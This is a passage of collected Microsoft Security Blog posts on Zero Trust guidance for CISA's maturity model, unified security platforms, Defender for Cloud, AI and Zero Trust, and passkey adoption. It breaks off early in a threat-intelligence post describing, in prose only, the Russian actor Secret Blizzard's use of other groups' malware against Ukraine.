Microsoft Malware Protection Center
New Microsoft guidance for the CISA Zero Trust Maturity Model
The Cybersecurity Infrastructure Security Agency (CISA) Zero Trust Maturity Model (ZTMM) assists agencies in development of their Zero Trust strategies and continued evolution of their implementation plans. In April of 2024, we released Microsoft guidance for the Department of Defense Zero Trust Strategy. And now, we are excited to share new Microsoft Guidance for CISA Zero Trust Maturity Model. Our guidance is designed to help United States government agencies and their industry partners configure Microsoft cloud services as they transition to Zero Trust, on their journey to achieve advanced and optimal security.
Microsoft has embraced Zero Trust principles—both in the way we secure our own enterprise environment and for our customers. We’ve been helping thousands of organizations worldwide transition to a Zero Trust security model, including many United States government agencies. In this blog, we’ll preview the new guidance and share how it helps United States government agencies and their partners implement their Zero Trust strategies. We’ll also share the Microsoft Zero Trust platform and relevant solutions that help meet CISA’s Zero Trust requirements, and close with two examples of real-world deployments.
CISA Zero Trust Maturity ModelUse this guidance to help meet the goals for ZTMM functions and make progress through maturity stages.
Learn more Microsoft supports CISA’s Zero Trust Maturity ModelCISA’s Zero Trust Maturity Model provides detailed guidance for organizations to evaluate their current security posture and identify necessary changes for transitioning to more modernized federal cybersecurity.
Figure 1. CISA Zero Trust Maturity Model.The CISA Zero Trust Maturity Model includes five pillars that represent protection areas for Zero Trust:
- Identity: An identity refers to an attribute or set of attributes that uniquely describes an agency user or entity, including non-person entities.
- Devices: A device refers to any asset (including its hardware, software, and firmware) that can connect to a network, including servers, desktop and laptop machines, printers, mobile phones, Internet of Things (IoT) devices, networking equipment, and more.
- Networks: A network refers to an open communications medium including typical channels such as agency internal networks, wireless networks, and the internet as well as other potential channels such as cellular and application-level channels used to transport messages.
- Applications and workloads: Applications and workloads include agency systems, computer programs, and services that execute on-premises, on mobile devices, and in cloud environments.
- Data: Data includes all structured and unstructured files and fragments that reside or have resided in federal systems, devices, networks, applications, databases, infrastructure, and backups (including on-premises and virtual environments) as well as the associated metadata.
The model also integrates capabilities that span across all pillars, to enhance cross-function interoperability—including visibility and analytics, automation and orchestration, and governance. The model further includes the four maturity stages of the Zero Trust Maturity Model:
- Traditional: The starting point for many government organizations, where assessment and identification of gaps helps determine security priorities.
- Initial: Organizations will have begun implementing automation in areas such as attribute assignment, lifecycle management, and initial cross-pillar solutions including integration of external systems, least privilege strategies, and aggregated visibility.
- Advanced: Organizations have progressed further along the maturity journey including centralized identity management and integrated policy enforcement across all pillars. Organizations build towards enterprise-wide visibility including near real time risk and posture assessments.
- Optimal: Organizations have fully automated lifecycle management implementing dynamic just-enough access (JEA) with just-in-time (JIT) controls for access to organization resources. Organizations implement continuous monitoring with centralized visibility.
Microsoft’s Zero Trust Maturity Model guidance serves as a reference for how government organizations should address key aspects of pillar-specific functions for each pillar, across each stage of implementation maturity, using Microsoft cloud services. Microsoft product teams and security architects supporting government organizations worked in close partnership to provide succinct, actionable guidance that aligns with the CISA Zero Trust Maturity Model and is organized by pillar, function, and maturity stage, with product guidance including linked references.
The guidance focuses on features available now (including public preview) in Microsoft commercial clouds. As cybersecurity threats continue to evolve, Microsoft will continue to innovate to meet the needs of our government customers. We’ve already launched more features aligned to the principles of Zero Trust—including Microsoft Security Exposure Management (MSEM) and more. Look for updates and announcements in the Microsoft Security Blog and check Microsoft Learn for Zero Trust guidance for Government customers to stay up to date with the latest information.
Microsoft’s Zero Trust platformMicrosoft is proud to be recognized as a Leader in the Forrester Wave™: Zero Trust Platform Providers, Q3 2023 report.1 The Microsoft Zero Trust platform is a modern security architecture that emphasizes proactive, integrated, and automated security measures. Microsoft 365 E5 combines best-in-class productivity apps with advanced security capabilities and innovations for government customers that include certificate-based authentication in the cloud, Conditional Access authentication strength, cross-tenant access settings, FIDO2 provisioning APIs, Azure Virtual Desktop support for passwordless authentication, and device-bound passkeys. Microsoft 365 is a comprehensive and extensible Zero Trust platform that spans hybrid cloud, multicloud, and multiplatform environments, delivering a rapid modernization path for organizations.
Figure 2. Microsoft Zero Trust Architecture.Microsoft cloud services that support the five pillars of the CISA Zero Trust Maturity Model include:
Microsoft Entra ID is an integrated multicloud identity and access management solution and identity provider that helps achieve capabilities in the identity pillar. It is tightly integrated with Microsoft 365 and Microsoft Defender XDR services to provide a comprehensive suite of Zero Trust capabilities including strict identity verification, enforcing least privilege, and adaptive risk-based access control. Built for cloud-scale, Microsoft Entra ID handles billions of authentications every day. Establishing it as your organization’s Zero Trust identity provider lets you configure, enforce, and monitor adaptive Zero Trust access policies in a single location. Conditional Access is the Zero Trust authorization engine for Microsoft Entra ID, enabling dynamic, adaptive, fine-grained, risk-based, access policies for any workload.
Microsoft Intune is a multiplatform endpoint and application management suite for Windows, MacOS, Linux, iOS, iPadOS, and Android devices. Its configuration policies manage devices and applications. Microsoft Defender for Endpoint helps organizations prevent, detect, investigate, and respond to advanced cyberthreats on devices. Microsoft Intune and Defender for Endpoint work together to enforce security policies, assess device health, vulnerability exposure, risk level, and configuration compliance status. Microsoft Intune and Microsoft Defender for Endpoint help achieve capabilities in the device pillar.
GitHub is a cloud-based platform where you can store, share, and work together with others to write code. GitHub Advanced Security includes features that help organizations improve and maintain code by providing code scanning, secret scanning, security checks, and dependency review throughout the deployment pipeline. Microsoft Entra Workload ID helps organizations use continuous integration and continuous delivery (CI/CD) with GitHub Actions. GitHub and Azure DevOps are essential to the applications and workloads pillar.
Microsoft Purview aligns to the data pillar activities, with a range of solutions for unified data security, data governance, and risk and compliance management. Microsoft Purview Information Protection lets you define and label sensitive information types. Auto-labeling within Microsoft 365 clients ensures data is appropriately labeled and protected. Microsoft Purview Data Loss Prevention integrates with Microsoft 365 services and apps, and Microsoft Defender XDR components to detect and prevent data loss.
Azure networking services include a range of software-defined network resources that can be used to provide networking capabilities for connectivity, application protection, application delivery, and network monitoring. Azure networking resources like Microsoft Azure Firewall Premium, Azure DDoS Protection, Microsoft Azure Application Gateway, Azure API Management, Azure Virtual Network, and network security groups, all work together to provide routing, segmentation, and visibility into your network. Azure networking services and network segmentation architectures are essential to the network pillar.
Microsoft Defender XDR plays key roles across multiple pillars, critical to both the automation and orchestration and visibility and analytics cross-cutting capabilities. It is a unified pre-breach and post-breach enterprise defense suite that natively coordinates detection, prevention, investigation, and response actions. It correlates millions of signals across endpoints, identities, email, and applications to automatically disrupt cyberattacks. Microsoft Defender XDR’s automated investigation and response and Microsoft Sentinel playbooks are used to complete security orchestration, automation, and response (SOAR) activities.
Microsoft Sentinel is essential to both automation and orchestration and visibility and analytics cross-cutting capabilities, along with any activities requiring SIEM integration. It is a cloud-based security information and event management (SIEM) you deploy in Azure. Microsoft Sentinel operates at cloud scale to accelerate security response and save time by automating common tasks and streamlining investigations with incident insights. Built-in data connectors make it easy to ingest security logs from Microsoft 365, Microsoft Defender XDR, Microsoft Entra ID, Azure, non-Microsoft clouds, and on-premises infrastructure.
Real-world pilots and implementations utilizing Microsoft guidanceThe United States Department of Agriculture (USDA) implements multifaceted solution for phishing-resistance initiative—In this customer story, the USDA implements phishing-resistant multifactor authentication (MFA)—which is important aspect of the identity pillar of the CISA Zero Trust Maturity Model. By selecting Microsoft Entra ID, the USDA was able to scale these capabilities to enforce phishing-resistant authentication with Microsoft Entra Conditional Access for their four main enterprise services—Windows desktop logon, Microsoft M365, VPN, single sign-on (SSO). By integrating their centralized WebSSO platform with Microsoft Entra ID and piloting more than 600 internal applications, the USDA incrementally and rapidly deployed the capability to support the applications and services relevant to most users. Read more about their experience making incremental improvements towards stronger phishing resistance with Microsoft Entra ID.
The United States Navy collaborates with Microsoft on CISA Zero Trust implementation—In this customer story, the United States Navy was able to utilize Zero Trust activity-level guidance to meet or exceed the Department of Defense (DoD) Zero Trust requirements with Microsoft Cloud services. And now with Microsoft guidance tailored for the United States government agencies, the aim is to help civilian agencies and their industry partners to do the same—meeting the CISA ZTMM recommendations at each maturity stage with Microsoft Cloud services. Together with Microsoft, the Navy developed an integrated model of security to help meet their ZT implementation goals. Read more about their collaboration with Microsoft.
Access Microsoft guidance for the United States Government customers and their partners. Embrace proactive and proven security with Zero Trust.
Learn moreTo learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.
1Forrester Wave™: Zero Trust Platform Providers, Q3 2023, Carlos Rivera and Heath Mullins, September 19th, 2023.
The post New Microsoft guidance for the CISA Zero Trust Maturity Model appeared first on Microsoft Security Blog.
Foundry study highlights the benefits of a unified security platform in new e-book
Microsoft observes more than 600 million ransomware, phishing, and identity attacks each day.¹ One major theme from our analysis of these attacks is clear—organizations with integrated tools have better visibility and more holistic defense than those using a broader portfolio of point solutions. Microsoft wanted to test this observation outside of its own telemetry, hiring Foundry to conduct a survey of senior-level IT decision makers with a primary role in security management at organizations with 500 or more employees to see what they’re experiencing.
The results are in, and they might be surprising. Of the study’s 156 respondents, those whose companies have implemented greater quantities of security solutions are experiencing a higher average number of security incidents—15.3 incidents versus 10.5 incidents for organizations with fewer security tools. That’s more than a 31% increase in self-reported incidents. You can read up on the full results in the e-book The unified security platform era is here.
This reinforces the observations Microsoft made based on its own telemetry. The security teams we see that prioritize deploying a diverse portfolio of “category leaders” often have overlapping policies and controls that create weak points. The silos created by separate solutions also make it hard to coordinate an effective defense before breaches happen, uncover the true scope of incidents, or to respond quickly.
The unified security platform era is hereRead the e-book to gain research-driven insights into securing your organization with a unified security platform.
Get the e-book Why consolidated security winsThe initial stages of cyberattacks remain fairly consistent year over year—with brute force identity attacks, phishing and social engineering, and internet-exposed vulnerabilities continuing to be the most common. Threat actors are still largely using opportunity-based tactics for these first few steps. It’s only once someone’s credentials are obtained by bad actors that they begin taking more targeted action against a company’s infrastructure. When they do this, the would-be cyberattackers often conduct significant reconnaissance, demonstrating a tremendous understanding of the enterprise environment by targeting the seams between security solutions and taking advantage of technical debt. Examples of this could include a test app from an untracked satellite tenant that doesn’t enforce multifactor authentication, devices infected with malware, or legacy authentication protocols.
Diverse tool portfolios are very likely to lack the integration and signal sharing required to help security teams to understand how, or even if, cyberattackers are exploiting their infrastructure. As a result, cyberattackers have more seams they can exploit, they can remain undetected longer, and security teams will have a harder time ensuring they’ve fully removed the attackers’ access.
While there will never be a single comprehensive security tool, organizations that streamline their security stacks by adopting a security platform that integrates controls, policies, and signals will have a more resilient and comprehensively protected environment that can respond to cyberthreats more effectively. The research done by Foundry and Microsoft shows how this unified security approach helps security teams act more efficiently, reduce core metrics like mean time to repair and mean time to acknowledge, and improve their overall security posture. By eliminating many of the potential seams between standalone solutions, these companies were able to prevent, detect, and respond to many more security threats as they emerged.
A streamlined, unified security approach like the Microsoft unified security operations platform, which provides its users with a consistent data model and reduced silos, can also generate better results from automation and AI—both of which are powerful tools that help security operations (SecOps) teams close critical security gaps through improved exposure management, resiliency, and incident detection and response. Equally, SecOps teams that gain a single, centralized, and contextualized view of their company’s cyberthreat exposure are better able to measure and improve their security posture. By gaining the visibility and tools to conduct this kind of exposure management, these teams are able to shift from traditional, reactive detection and response-based security postures to more proactive postures that prioritize exposure-mitigating actions across devices, identities, applications, data, and their multicloud infrastructure.
Unified security means fewer cyberattacks and improved postureThe two biggest reported challenges facing respondents who were looking to improve their security posture were the complexity of their current environment and poor visibility across their security landscape. In fact, these challenges have become so universally apparent to the Foundry study’s survey participants that 91% of respondents operating a best-of-breed security approach are prioritizing vendor consolidation in the next 12 months. The same is true of 79% of respondents using 10 or more security tools. This strategy helps shift toward a more proactive security posture, and the Foundry study shows that it can also have a dramatically positive effect on the average number of security incidents a company faces.
As 2024 has shown, keeping software up to date and installing strong security measures isn’t enough. It is nearly impossible for any organization to “out-patch” threat actors. Everyone needs to shift away from working through lists of vulnerabilities and to focus more on thinking like a cyberattacker—viewing vulnerabilities not as a list, but as elements that could be chained together to breach our environments in order to reach critical assets.
This is made much more difficult when using a diverse array of security vendors for each of your main security domains. Gaining visibility into possible attack paths, prioritizing based on potential incident severity, and then confidently removing the vulnerabilities is all made vastly more difficult when the work needs to be done manually across dozens of silos.
A unified platform changes how risk exposure can be handled. For example, security teams can use attack paths to remove vulnerabilities as if they’re responding to security incidents—with a prioritized list, systematically addressed based on variables like sensitivity of data, importance of critical assets, and severity of exposure. And with the native integrations of a platform, this value can be extended beyond just managing vulnerabilities. If you’re investigating a new incident and you’re shown that one of the compromised entities could lead to critical assets, that context could make the difference between routine remediation and a board-level briefing.
Get the e-book for more insights on a unified security platform Setting out on your unified security platform journeyReducing and consolidating security tools around a unified security platform is no small feat, either technologically or culturally. To get started, target a few small but key areas. This will give your security operations center (SOC) team a few quick wins and prove the value of consolidation to you and your stakeholders. You’ll also be able to customize and refine your new environment, ensuring necessary integrations are in place for end-to-end visibility without disrupting operations. You may also want to focus on change management early on, reskilling team members in a way that provides ample time for them to ramp up before going live.
Moving to a unified security platform is not just about improving defenses, so don’t forget to lend some of your time to maintaining positive employee experiences. Reducing friction across endpoint devices, apps, identities, and networks will make it easier for employees to access the systems and data they need. It also reduces the chance that employees will try to bypass new security policies in the interest of maintaining learned behaviors. To learn more about consolidating your security platform, the current state of threat protection, where organizations and security professionals are focusing with their current practices, and where they see opportunities for using AI in security operations, check out the new e-book The unified security platform era is here. And head over to the Microsoft Security web page for more information about how Microsoft is innovating in the security space, including through the use of responsible AI.
Learn moreLearn more about the Microsoft unified security operations platform.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.
About the researchFoundry conducted an online study to understand the current state of cyberthreat protection, where organizations and security professionals are focusing with their current practices, and where they see opportunities for using AI in security operations.
The study, commissioned by Microsoft, was conducted in June 2024. The 156 respondents comprised senior-level IT decision-makers with a primary role in security management, at organizations with 500 or more employees.
¹Microsoft Digital Defense Report 2024.
The post Foundry study highlights the benefits of a unified security platform in new e-book appeared first on Microsoft Security Blog.
Microsoft Defender for Cloud named a Leader in Frost Radar™ for CNAPP for the second year in a row!
In the ever-evolving landscape of cloud security, Microsoft continues to assert its dominance with its comprehensive and innovative solutions. The Frost Radar™: Cloud-Native Application Protection Platforms, 2024 report underscores Microsoft’s leadership in both – the innovation and growth index, highlighting several key strengths that set it apart from the competition.
Frost and Sullivan states in its report, “With significant investments in cloud security, a strong partner network, and strategic positioning as a multicloud security provider, Microsoft has a solid foundation for sustained growth in the next few years to maintain its lead in the cloud security industry as competition increases.”
Figure 1. Frost RadarTM: Cloud-Native Application Protection Platforms 2024 showing Microsoft as a leader.
Unified and Comprehensive Security
The report highlights that Microsoft’s Defender for Cloud stands out as a unified Cloud-Native Application Protection Platform (CNAPP) that integrates a broad range of security functionalities to protect both cloud and hybrid environments. Defender for Cloud includes workload security, Cloud Security Posture Management (CSPM), Infrastructure as Code (IaC) security, Data Security Posture Management, DevOps security with CI/CD pipeline hardening, AI-driven Security Posture Management (SPM), and Cloud Infrastructure Entitlement Management (CIEM) through Microsoft Entra Permissions Management. This extensive range of capabilities ensures end-to-end visibility and protection for cloud-native applications, making it a robust choice for organizations of all sizes.
Seamless Platform Integration and Advanced Threat Protection
The report also recognizes that one of Microsoft’s significant advantages is its ability to leverage its extensive ecosystem to provide seamless integration and advanced threat protection. Defender for Cloud integrates effortlessly with tools like Visual Studio, GitHub, and Azure DevOps during the development phase, embedding security early in the lifecycle. In production, it works with Microsoft Defender XDR, Microsoft Security Exposure Management, and Security Copilot to deliver advanced threat protection, reduce attack surfaces, and continuously monitor security posture across multi-cloud and hybrid environments. This holistic approach ensures that security is not an afterthought but a fundamental aspect of the entire development and deployment process.
Data-Aware Security and Multicloud Support
According to Frost, Microsoft excels in data-aware security, offering granular visibility into sensitive assets with advanced data classification and monitoring through Microsoft Purview integration with Defender for Cloud. This capability is crucial for organizations that need to manage and protect sensitive data across various cloud environments. Additionally, Defender for Cloud supports a wide range of workloads, including Azure, AWS, and Google Cloud, using both agent-based and agentless scanning. This multicloud support is a testament to Microsoft’s commitment to providing flexible and comprehensive security solutions that cater to diverse customer needs.
Market Leadership and Robust Growth
Frost & Sullivan’s report praises Microsoft’s strategic positioning as a security player, enabling it to dominate the CNAPP market. The report highlights that Microsoft has been the largest player in the market over the last four years, with a projected revenue growth of 32.5% in 2024, capturing a dominant market share of 24.7%. This impressive growth is driven by its massive customer base from its Azure business and its extensive network of over 15,000 security partners, GSIs, MSSPs, and a thriving independent software vendor community. Microsoft’s ability to leverage its vast ecosystem and strategic partnerships has solidified its leadership position and set the stage for sustained growth in the coming years.
Innovation, Gen AI and Future Prospects
The Frost report also noted that Microsoft’s commitment to innovation is evident in its continuous enhancement of Defender for Cloud’s capabilities. The platform’s integration with advanced AI and machine learning technologies, such as Microsoft Security Copilot provides organizations with real-time threat detection and response capabilities. This focus on innovation ensures that Microsoft remains at the forefront of cloud security, addressing emerging threats and evolving customer needs.
In conclusion, Microsoft’s Defender for Cloud exemplifies the company’s strengths in providing a unified, comprehensive, and innovative security solution for cloud-native applications. Its seamless integration, advanced threat protection, data-aware security, and robust market presence make it a leader in the CNAPP space. As organizations continue to navigate the complexities of cloud security, Microsoft’s solutions offer the reliability and advanced capabilities needed to protect their digital assets effectively.
To learn more about Defender for Cloud:
- Check out our cloud security solution page.
- Learn how you can unlock business value with Defender for Cloud.
- See it in action with a cloud detection and response use-case.
- Start a free trial.
The post Microsoft Defender for Cloud named a Leader in Frost Radar™ for CNAPP for the second year in a row! appeared first on Microsoft Security Blog.
Agile Business, agile security: How AI and Zero Trust work together
Traditional security approaches don’t work for AI. Generative AI technology is already transforming our world and has immense positive potential for cybersecurity and business processes, but traditional security models and controls aren’t enough to manage the security risks associated with this new technology.
We recently published a new whitepaper that examines the security challenges and opportunities from generative AI, what security must do to adapt to manage risk related to it, how a Zero Trust approach is essential to effectively secure this AI technology (and underlying data), and how different roles across your organization must work together for effective AI security.
AI security and Zero TrustAgile security for agile businesses.
Read the whitepaper Navigating AI’s unique challengesAI presents new types of problems that require different thinking and different solutions.
Generative AI is dynamicAt the most fundamental level, generative AI is non-deterministic computing, which means that it doesn’t provide the exact same output each time you run it. For example, asking an image generation model to “draw a picture of a kitten in a security guard uniform” repeatedly is unlikely to generate the exact same picture twice (though they will all be similar). Static security controls assume that vulnerabilities (in the broader definition) and their exploitation so they will look exactly the same each time will not be particularly effective at detecting and blocking attacks on AI. You need controls made for AI.
Generative AI is data-centricGenerative AI is fundamentally a data analysis and data generation technology, making the security and governance of your data incredibly important to the security of your AI applications and the reliability and trustworthiness of their outputs.
You need to have an asset-centric and data-centric security approach that can handle dynamic changes to secure AI and the data it relies on. This means you need a Zero Trust approach to effectively secure AI.
Zero Trust is simply modern security without the false assumption that a network security perimeter is enough to secure assets in it (including data). This drives a mindset shift that changes how you look at security strategy, architecture, controls, and more. Zero Trust focuses security protecting business assets inside and outside the classic network perimeter across the ‘hybrid of everything’ environments (including multiplatform, multicloud, on-premises, operational technology, Internet of Things, and more).
Cyberattackers are using generative AI against youAnother complication is that AI relies on vast amounts of data to train models, making your data a prime target for cyberattackers and elevating the importance of protecting your data. Cybercriminals are also using AI now to refine attack techniques and process the data they steal from organizations. Organizations must recognize that these threats are already happening and urgently adapt their security strategies to effectively protect their data, AI applications, business assets, and people.
By applying Zero Trust principles, organizations can reduce the risk related to AI while rapidly embracing the opportunities that this technology offers.
Key strategies to help manage AI security risksThese strategies from the whitepaper illustrate how to manage the risks associated with AI.
- Provide guidance to users. Cyberattackers are using AI to improve the quality and volume of scam emails and phone calls (sometimes called phishing or business email compromise) that will be experienced by nearly anyone in the organization. Organizations must urgently start educating everyone (starting with financial roles and other high-business-impacting roles) so that they understand that they are likely to see these highly convincing fake communications and what to do about it. People will need to understand the basics of how AI works, the risks that it poses, and what they can do about it (such as how to spot it, how to report it to security teams, or how to enhance business processes to independently verify important transactions).
- Protect AI applications and data. Cybercriminals are actively targeting AI systems. Early integration of security in AI development is crucial to avoid costly fixes later.
- Adopt AI security capabilities. While AI is not a magical silver bullet that can replace talented human experts and existing tools, AI technology can significantly enhance security operations (SecOps) by empowering people to get more out of their data and tools (quickly writing up reports, analyzing business impact of attacks, guiding newer analysts through investigation, and more).
- Policy and standards. Organizations need written security standards and processes to guide their team’s decisions and demonstrate they are following due diligence to regulators. These standards should cover security, privacy, and ethical considerations—you can use Microsoft’s Responsible AI Standard as a reference to guide this work.
We have found that there is a symbiotic relationship between Zero Trust and Generative AI where:
- AI requires a Zero Trust approach to effectively protect data and AI applications.
- AI-powered capabilities can help accelerate Zero Trust by analyzing vast data signals, extracting key insights, guiding humans through key processes, and automating repetitive manual tasks. This allows your teams to cut through the noise, responding to threats faster, and continuously learn and grow their expertise.
The Zero Trust approach to security helps you keep up with continuously changing threats as well as the rapid evolution of technology that AI represents. I will wrap this blog with a quote from the new whitepaper:
“By integrating security early and embracing Zero Trust principles, organizations can take advantage of AI while mitigating risks, much like brakes on a car enable people to safely travel faster.”
Learn more about the Zero Trust approachTo learn more about how Zero Trust can guide this approach, visit the Zero Trust Model webpage and explore additional resources at the Zero Trust Guidance Center. Check out Mark’s List for additional resources.
Download our whitepaper to help your organization navigate its secure AI journey.For more security resources and links, you can visit our LinkedIn. You can also bookmark the Security blog to keep up with security news and follow Microsoft Security on LinkedIn and X (@MSFTSecurity).
The post Agile Business, agile security: How AI and Zero Trust work together appeared first on Microsoft Security Blog.
Convincing a billion users to love passkeys: UX design insights from Microsoft to boost adoption and security
There’s no doubt about it: The password era is ending. Bad actors know it, which is why they’re desperately accelerating password-related attacks while they still can.
At Microsoft, we block 7,000 attacks on passwords per second—almost double from a year ago. At the same time, we’ve seen adversary-in-the-middle phishing attacks increase by 146% year over year.1 Fortunately, we’ve never had a better solution to these pervasive attacks: passkeys.
Passkeys not only offer an improved user experience by letting you sign in faster with your face, fingerprint, or PIN, but they also aren’t susceptible to the same kinds of attacks as passwords. Plus, passkeys eliminate forgotten passwords and one-time codes and reduce support calls.
In this blog, we’ll share how Microsoft approached this unique opportunity to bring passkeys to consumers.
Embracing the opportunity to improve sign-insIn May 2024, Microsoft announced that you can sign in to your favorite consumer apps and services, such as Xbox, Microsoft 365, or Microsoft Copilot, using a passkey. Since passkeys are still a relatively new technology, as we began this journey, we asked ourselves: How are we going to convince more than a billion people to love passkeys as much as we do?
Somehow, we had to convince an incredibly large and diverse population to permanently change a familiar behavior—and be excited about it.
To make sure we got our passkey experience right, we adopted a simple methodology: Start small, experiment, then scale like crazy. The results have been encouraging:
- Signing in with a passkey is three times faster than using a traditional password and eight times faster than a password and traditional multifactor authentication.
- Users are three times more successful signing in with passkeys than with passwords (98% versus 32%).
- 99% of users who start the passkey registration flow complete it.
Our first step was to build support for passkeys that could work across our apps. In May 2024, we added a simple option to the Microsoft account settings page to enroll a passkey:
We also added a new option to authenticate with a passkey on our sign-in page:
As thousands of people began enrolling and using passkeys every day, we learned a lot. For example, while the term “passkey” was sometimes unfamiliar, the phrase “face, fingerprint, or PIN” was generally well understood, so it was important to connect these two concepts in our user experience (UX).
Step 2: ExperimentWith a good foundation in place, we began to experiment. We didn’t want passkeys to be “just another way to sign in.” We wanted them to be “the best way to sign in.”
To do this, we had to figure out when, where, and how to approach users to enroll a passkey. We developed a hypothesis that a passive approach (requiring users to visit their account settings on their own to enroll a passkey) would never yield the results we wanted, so we needed to proactively invite users to enroll a passkey.
When and where to nudge usersThe most natural enrollment opportunity is when a user initially creates an account. But when and where would be the best time for existing users to create a passkey? Right after they sign in? During a password reset?
While we were cautious with any changes that might prevent our users from quickly accessing their accounts, we discovered that users were very enthusiastic about the invitation to enroll a passkey—even when they weren’t expecting it. About 25% of users who saw a nudge engaged with it—five times our pre-launch expectations. We also learned that the option to create a passkey where users manage their credentials accounted for fewer than 1% of total enrollments. These results confirmed our hypothesis.
Figure 3. Proactive nudges at key points in the UX proved more effective for getting users to enroll a passkey.
How best to nudge usersAs we began to understand where and when to invite users to enroll passkeys, we also explored “how.” We ran multiple user studies and tested every pixel in our nudge screen to answer the question, “What would motivate a user to stop what they’re doing and enroll a passkey?”
First, we wanted to understand which value proposition would resonate most. Surprisingly, an easier sign in didn’t resonate with users as strongly as a faster or more secure sign in. Perhaps less surprising was discovering that security and speed resonated almost equally. Approximately 24% of users shown a message emphasizing security clicked through while approximately 27% of users shown messaging about speed clicked through.
Figure 4. Messaging about “better security” and “faster sign-in” enticed more users to enroll a passkey than “ease of use.”
If a user sees a nudge and chooses to enroll a passkey, great! But, if they see the nudge and decide that now isn’t the right time, we wanted to frame their decision in a positive way. The button text, “Skip for now,” respects that the user isn’t ready to enroll a passkey yet and lets them continue with what they were doing, but it also sets the expectation that we’re going to ask again. We’re implementing logic that determines how often to show a nudge so as not to overwhelm users, but we don’t let them permanently opt out of passkey invitations. We want users to get comfortable with the idea that passkeys will be the new normal.
Figure 5. We don’t let users permanently opt out of passkey invitations, but we keep the messaging friendly.
The exciting results of our experiments are helping us craft the best experience possible for our users, and we’re continuing to evolve. We encourage you to run your own experiments as well. Your products and users are different from ours and you might discover different outcomes. However, if you’re looking for a good place to start, messaging about speed and security is probably a safe bet. We also encourage you to reference the fantastic research that the FIDO Alliance has done, along with the UX guidelines they’ve published.
Step 3: ScaleAs our users began to enroll passkeys at scale, our sign-in experience needed to behave more intelligently to encourage passkey use. As we redesigned the experience, we followed these guiding principles:
- Secure: A great sign-in experience should prioritize security without sacrificing usability.
- Low cognitive load: A great sign-in experience should have low cognitive load. People don’t want to stare at a list of sign-in options to try to decide which one to use. They just want in, and we should make that easy for them.
- Evolving: A great sign-in experience should not only prioritize the best available method, but also continuously move users to more secure methods.
With these principles in mind, we came up with a completely reimagined sign-in experience. If the user has a passkey available, it’s always the preferred method. We don’t list all the different ways the user can sign in and ask them to choose one, we just show the passkey sign in user interface (UI) and that’s it. They are safely and quickly signed in.
Figure 6. The sign-in experience defaults to passkey if the user has one available.
If the user doesn’t have a passkey yet, we determine the next best available credential. Once the user successfully authenticates, we immediately invite them to enroll a passkey. If they do, then the next time they sign in, their passkey will be the best available credential and is set as the new default. Our initial launch of this new design saw a 10% drop in password use and a 987% increase in passkey use.
With data to support our design decisions, we’ve started setting defaults and introducing passkeys at a global scale:
- New users are invited to enroll a passkey when they create an account.
- Existing users are invited to enroll passkeys at key pivot points, such as after they sign in or during a password reset.
- Passkeys are set as the default sign-in option for users who have them.
Based on the current adoption rate, we project that hundreds of millions of new users will create and use passkeys over the coming months.
The passwordless journeyWhile enrolling passkeys is an important step, it’s just the beginning. Even if we get our more than one billion users to enroll and use passkeys, if a user has both a passkey and a password, and both grant access to an account, the account is still at risk for phishing. Our ultimate goal is to remove passwords completely and have accounts that only support phishing-resistant credentials.
In 2022, we made it possible for users to completely remove their password and sign in with alternative methods. Since then, millions of users have deleted their passwords and protected themselves against password-based attacks. Now with passkeys, we can truly replace passwords with something faster, safer, and easier to use. It’s an ambitious vision, but we firmly believe in a phishing-resistant future for all scenarios, including account recovery and bootstrapping.
Learning from our experienceHere are a few suggestions based on our learnings:
- Don’t be shy about inviting users to enroll passkeys. Our experiments show that people love passkeys and are ready for them. If they don’t enroll when you first ask, don’t assume their decision is permanent. Make sure to test a few variations of your designs and copy to determine what’s most effective. We found that messages around sign-in speed and improved security resonate strongly.
- Make it as easy as possible to enroll and use passkeys. People want quick and secure access to their accounts. They don’t want to think about signing in. Set defaults to prioritize the best available method when possible.
- Raise the floor. Passkeys are an important step on the path towards a more secure and seamless authentication future. Start planning ahead now to use only phishing-resistant credentials.
Finally, we believe that passkey adoption is a virtuous cycle, and transitioning the world away from passwords is bigger than any one company. As more relying parties prioritize passkey support, passkeys will first become recognized, then familiar, then expected—everywhere you sign in. As people become increasingly familiar with the usability and security benefits of passkeys, they’ll be more likely to enroll and use them on more sites. Together, we can convince billions and billions of users to enroll passkeys for trillions of accounts! We’re proud to be part of this collective effort and hope you will share learnings as well as you progress in your passkey journey.
Learn moreTo learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.
1Microsoft Digital Defense Report 2024.
The post Convincing a billion users to love passkeys: UX design insights from Microsoft to boost adoption and security appeared first on Microsoft Security Blog.
Frequent freeloader part II: Russian actor Secret Blizzard using tools of other groups to attack Ukraine
After co-opting the tools and infrastructure of another nation-state threat actor to facilitate espionage activities, as detailed in our last blog, Russian nation-state actor Secret Blizzard used those tools and infrastructure to compromise targets in Ukraine. Microsoft Threat Intelligence has observed that these campaigns consistently led to the download of Secret Blizzard’s custom malware, with the Tavdig backdoor creating the foothold to install their KazuarV2 backdoor.
Between March and April 2024, Microsoft Threat Intelligence observed Secret Blizzard using the Amadey bot malware relating to cybercriminal activity that Microsoft tracks as Storm-1919 to download its backdoors to specifically selected target devices associated with the Ukrainian military. This was at least the second time since 2022 that Secret Blizzard has used a cybercrime campaign to facilitate a foothold for its own malware in Ukraine. Microsoft also assesses that in January 2024, Secret Blizzard used the backdoor of Storm-1837, a Russia-based threat actor that targets Ukrainian military drone pilots, to download the Tavdig and KazuarV2 backdoors on a target device in Ukraine.
Commandeering other threat actors’ access highlights Secret Blizzard’s approach to diversifying its attack vectors, including using strategic web compromises (watering holes) and adversary-in-the-middle (AiTM) campaigns likely facilitated via legally mandated intercept systems in Russia such as the “System for Operative Investigative Activities” (SORM). More commonly, Secret Blizzard uses spear phishing as its initial attack vector, then server-side and edge device compromises to facilitate further lateral movement within a network of interest.
